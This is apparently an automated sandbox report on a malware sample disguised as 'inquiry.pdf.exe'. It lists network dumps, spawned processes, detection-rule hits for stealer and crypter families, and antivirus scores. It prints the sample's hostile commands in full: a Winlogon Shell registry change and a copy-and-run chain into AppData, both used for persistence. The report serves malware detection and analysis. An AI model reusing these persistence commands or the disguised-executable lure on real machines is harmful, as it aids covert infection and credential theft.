                                                                                                            Data Ascii: ipt><div class=gbm id=gbd5 aria-owner=gbg5><div class=gbmc><ol id=gbom class=gbmcc><li class="gbkc gbmtc"><a class=gbmt href="/preferences?hl=en">Search settings</a></li><li class=gbmtc><div class="gbmt gbmh"></div></li><li class="gbkp gbmtc"><a class=gb
                                                                                                            2022-10-03 15:29:37 UTC92INData Raw: 67 6c 65 20 53 65 61 72 63 68 22 20 6d 61 78 6c 65 6e 67 74 68 3d 22 32 30 34 38 22 20 6e 61 6d 65 3d 22 71 22 20 73 69 7a 65 3d 22 35 37 22 3e 3c 2f 64 69 76 3e 3c 62 72 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 64 73 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 73 62 62 22 3e 3c 69 6e 70 75 74 20 63 6c 61 73 73 3d 22 6c 73 62 22 20 76 61 6c 75 65 3d 22 47 6f 6f 67 6c 65 20 53 65 61 72 63 68 22 20 6e 61 6d 65 3d 22 62 74 6e 47 22 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 64 73 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 73 62 62 22 3e 3c 69 6e 70 75 74 20 63 6c 61 73 73 3d 22 6c 73 62 22 20 69 64 3d
                                                                                                            Data Ascii: gle Search" maxlength="2048" name="q" size="57"></div><br style="line-height:0"><span class="ds"><span class="lsbb"><input class="lsb" value="Google Search" name="btnG" type="submit"></span></span><span class="ds"><span class="lsbb"><input class="lsb" id=
                                                                                                            2022-10-03 15:29:37 UTC94INData Raw: 69 6e 64 65 78 4f 66 28 22 26 67 62 76 3d 32 22 29 29 7b 76 61 72 20 66 3d 67 6f 6f 67 6c 65 2e 67 62 76 75 2c 67 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 67 62 76 22 29 3b 67 26 26 28 67 2e 76 61 6c 75 65 3d 61 29 3b 66 26 26 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 66 7d 2c 30 29 7d 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 66 6f 72 6d 3e 3c 64 69 76 20 69 64 3d 22 67 61 63 5f 73 63 6f 6e 74 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 38 33 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 33 2e 35 65 6d 22 3e 3c 62 72 3e 3c 64 69 76 20 69 64 3d 22 70 72 6d 22
                                                                                                            Data Ascii: indexOf("&gbv=2")){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div id="gac_scont"></div><div style="font-size:83%;min-height:3.5em"><br><div id="prm"
                                                                                                            2022-10-03 15:29:37 UTC95INData Raw: 6c 2f 65 6e 2f 61 64 73 2f 22 3e 41 64 76 65 72 74 69 73 69 6e 67 a0 50 72 6f 67 72 61 6d 6d 65 73 3c 2f 61 3e 3c 61 20 68 72 65 66 3d 22 2f 73 65 72 76 69 63 65 73 2f 22 3e 42 75 73 69 6e 65 73 73 20 53 6f 6c 75 74 69 6f 6e 73 3c 2f 61 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 74 6c 2f 65 6e 2f 61 62 6f 75 74 2e 68 74 6d 6c 22 3e 41 62 6f 75 74 20 47 6f 6f 67 6c 65 3c 2f 61 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 65 74 70 72 65 66 64 6f 6d 61 69 6e 3f 70 72 65 66 64 6f 6d 3d 47 42 26 61 6d 70 3b 70 72 65 76 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 26 61 6d 70 3b 73 69 67 3d 4b 5f 65 4e 41 4f 4c 55 4f 78 47 6a 6b 35 73 2d 42 6e 73 75 6e 6d 68 7a 47 41 4b 47 34
                                                                                                            Data Ascii: l/en/ads/">AdvertisingProgrammes</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a><a href="https://www.google.com/setprefdomain?prefdom=GB&amp;prev=https://www.google.co.uk/&amp;sig=K_eNAOLUOxGjk5s-BnsunmhzGAKG4
                                                                                                            2022-10-03 15:29:37 UTC96INData Raw: 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7d 3b 0a 76 61 72 20 67 3b 76 61 72 20 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 74 68 69 73 2e 67 3d 62 3d 3d 3d 68 3f 61 3a 22 22 7d 3b 6c 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 2b 22 22 7d 3b 76 61 72 20 68 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 29 7b 76 61 72 20 61 3d 75 3b 67 6f 6f 67 6c 65 2e 6c 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 70 28 61 29 3b 67 6f 6f 67 6c 65 2e 6c 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 7d 3b 67 6f 6f 67 6c 65 2e 62 78 7c 7c 67 6f 6f 67 6c 65 2e 6c 78 28 29 7d 0a 66 75 6e 63 74 69 6f 6e 20 70 28 61 29 7b 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 26 26 67 6f 6f 67 6c 65 2e 74 69 6d 65
                                                                                                            Data Ascii: n(a){return a};var g;var l=function(a,b){this.g=b===h?a:""};l.prototype.toString=function(){return this.g+""};var h={};function n(){var a=u;google.lx=function(){p(a);google.lx=function(){}};google.bx||google.lx()}function p(a){google.timers&&google.time
                                                                                                            2022-10-03 15:29:37 UTC97INData Raw: 65 70 3a 30 2c 73 6e 65 74 3a 74 72 75 65 2c 73 74 72 74 3a 30 2c 75 62 6d 3a 66 61 6c 73 65 2c 75 77 70 3a 74 72 75 65 7d 3b 7d 29 28 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 70 6d 63 3d 27 7b 5c 78 32 32 64 5c 78 32 32 3a 7b 7d 2c 5c 78 32 32 73 62 5f 68 65 5c 78 32 32 3a 7b 5c 78 32 32 61 67 65 6e 5c 78 32 32 3a 74 72 75 65 2c 5c 78 32 32 63 67 65 6e 5c 78 32 32 3a 74 72 75 65 2c 5c 78 32 32 63 6c 69 65 6e 74 5c 78 32 32 3a 5c 78 32 32 68 65 69 72 6c 6f 6f 6d 2d 68 70 5c 78 32 32 2c 5c 78 32 32 64 68 5c 78 32 32 3a 74 72 75 65 2c 5c 78 32 32 64 68 71 74 5c 78 32 32 3a 74 72 75 65 2c 5c 78 32 32 64 73 5c 78 32 32 3a 5c 78 32 32 5c 78 32 32 2c 5c 78 32 32 66 66 71 6c 5c 78 32 32 3a 5c 78 32 32 65 6e 5c 78 32 32 2c 5c 78 32 32 66 6c 5c 78 32
                                                                                                            Data Ascii: ep:0,snet:true,strt:0,ubm:false,uwp:true};})();(function(){var pmc='{\x22d\x22:{},\x22sb_he\x22:{\x22agen\x22:true,\x22cgen\x22:true,\x22client\x22:\x22heirloom-hp\x22,\x22dh\x22:true,\x22dhqt\x22:true,\x22ds\x22:\x22\x22,\x22ffql\x22:\x22en\x22,\x22fl\x2
                                                                                                            2022-10-03 15:29:37 UTC98INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Statistics

                                                                                                            CPU Usage

                                                                                                            Click to jump to process

                                                                                                            Memory Usage

                                                                                                            Click to jump to process

                                                                                                            High Level Behavior Distribution

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Behavior

                                                                                                            Click to jump to process

                                                                                                            System Behavior

                                                                                                            General

                                                                                                            Target ID:0
                                                                                                            Start time:17:28:35
                                                                                                            Start date:03/10/2022
                                                                                                            Path:C:\Users\user\Desktop\inquiry.pdf.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Users\user\Desktop\inquiry.pdf.exe
                                                                                                            Imagebase:0xa90000
                                                                                                            File size:686592 bytes
                                                                                                            MD5 hash:6236E43DA1B2C6279760E6B2B7E2D40F
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.327749606.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.316384133.0000000002A8D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                            • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                            • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.319901193.0000000002B4E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.325693472.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low

                                                                                                            General

                                                                                                            Target ID:10
                                                                                                            Start time:17:29:03
                                                                                                            Start date:03/10/2022
                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:cmd" /c ping 127.0.0.1 -n 7 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\glonkjhg.exe,
                                                                                                            Imagebase:0xb0000
                                                                                                            File size:232960 bytes
                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            General

                                                                                                            Target ID:11
                                                                                                            Start time:17:29:03
                                                                                                            Start date:03/10/2022
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff745070000
                                                                                                            File size:625664 bytes
                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            General

                                                                                                            Target ID:12
                                                                                                            Start time:17:29:04
                                                                                                            Start date:03/10/2022
                                                                                                            Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:ping 127.0.0.1 -n 7
                                                                                                            Imagebase:0x1c0000
                                                                                                            File size:18944 bytes
                                                                                                            MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            General

                                                                                                            Target ID:13
                                                                                                            Start time:17:29:07
                                                                                                            Start date:03/10/2022
                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:cmd" /c ping 127.0.0.1 -n 12 > nul && copy "C:\Users\user\Desktop\inquiry.pdf.exe" "C:\Users\user\AppData\Roaming\glonkjhg.exe" && ping 127.0.0.1 -n 12 > nul && "C:\Users\user\AppData\Roaming\glonkjhg.exe
                                                                                                            Imagebase:0xb0000
                                                                                                            File size:232960 bytes
                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            General

                                                                                                            Target ID:14
                                                                                                            Start time:17:29:07
                                                                                                            Start date:03/10/2022
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff745070000
                                                                                                            File size:625664 bytes
                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            General

                                                                                                            Target ID:15
                                                                                                            Start time:17:29:07
                                                                                                            Start date:03/10/2022
                                                                                                            Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:ping 127.0.0.1 -n 12
                                                                                                            Imagebase:0x1c0000
                                                                                                            File size:18944 bytes
                                                                                                            MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            General

                                                                                                            Target ID:16
                                                                                                            Start time:17:29:11
                                                                                                            Start date:03/10/2022
                                                                                                            Path:C:\Windows\SysWOW64\reg.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\glonkjhg.exe,"
                                                                                                            Imagebase:0x1370000
                                                                                                            File size:59392 bytes
                                                                                                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            General

                                                                                                            Target ID:17
                                                                                                            Start time:17:29:20
                                                                                                            Start date:03/10/2022
                                                                                                            Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:ping 127.0.0.1 -n 12
                                                                                                            Imagebase:0x1c0000
                                                                                                            File size:18944 bytes
                                                                                                            MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            General

                                                                                                            Target ID:18
                                                                                                            Start time:17:29:32
                                                                                                            Start date:03/10/2022
                                                                                                            Path:C:\Users\user\AppData\Roaming\glonkjhg.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Users\user\AppData\Roaming\glonkjhg.exe
                                                                                                            Imagebase:0x1250000
                                                                                                            File size:686592 bytes
                                                                                                            MD5 hash:6236E43DA1B2C6279760E6B2B7E2D40F
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000012.00000002.520061729.0000000002B9D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                            • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                            • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 100%, Avira
                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                            • Detection: 39%, ReversingLabs

                                                                                                            General

                                                                                                            Target ID:19
                                                                                                            Start time:17:29:49
                                                                                                            Start date:03/10/2022
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                            Imagebase:0x490000
                                                                                                            File size:42080 bytes
                                                                                                            MD5 hash:F2A47587431C466535F3C3D3427724BE
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000013.00000000.404261855.0000000000A54000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                            • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000013.00000000.404261855.0000000000A54000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmp, Author: unknown

                                                                                                            General

                                                                                                            Target ID:20
                                                                                                            Start time:17:29:53
                                                                                                            Start date:03/10/2022
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                            Imagebase:0x8c0000
                                                                                                            File size:42080 bytes
                                                                                                            MD5 hash:F2A47587431C466535F3C3D3427724BE
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                            • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000014.00000003.486255631.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                            • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000014.00000003.486255631.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000014.00000003.485919583.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                            • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000014.00000003.485919583.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000014.00000003.486150119.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                            • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000014.00000003.486150119.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

                                                                                                            General

                                                                                                            Target ID:23
                                                                                                            Start time:17:30:30
                                                                                                            Start date:03/10/2022
                                                                                                            Path:C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
                                                                                                            Imagebase:0x700000
                                                                                                            File size:78336 bytes
                                                                                                            MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 100%, Avira
                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                            • Detection: 77%, ReversingLabs
                                                                                                            • Detection: 14%, Metadefender, Browse

                                                                                                            General

                                                                                                            Target ID:24
                                                                                                            Start time:17:30:32
                                                                                                            Start date:03/10/2022
                                                                                                            Path:C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
                                                                                                            Imagebase:0x10000
                                                                                                            File size:78336 bytes
                                                                                                            MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:.Net C# or VB.NET

                                                                                                            General

                                                                                                            Target ID:25
                                                                                                            Start time:17:30:35
                                                                                                            Start date:03/10/2022
                                                                                                            Path:C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
                                                                                                            Imagebase:0x90000
                                                                                                            File size:78336 bytes
                                                                                                            MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:.Net C# or VB.NET

                                                                                                            General

                                                                                                            Target ID:26
                                                                                                            Start time:17:30:37
                                                                                                            Start date:03/10/2022
                                                                                                            Path:C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
                                                                                                            Imagebase:0x7a0000
                                                                                                            File size:78336 bytes
                                                                                                            MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:.Net C# or VB.NET

                                                                                                            Disassembly

                                                                                                            Reset < >

                                                                                                              Executed Functions

                                                                                                              Function 00E34518 Relevance: 1.9, Strings: 1, Instructions: 686COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.313395036.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e30000_inquiry.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: d
                                                                                                              • API String ID: 0-2564639436
                                                                                                              • Opcode ID: f117bb7c851d30c6fe1cfeb8a93371b56deee381247a848200520262826f5ccf
                                                                                                              • Instruction ID: 7245a11f0f43b83b0db2b7736e0967e1d7d5bdbcc33c1327e7400e25c47a9ec3
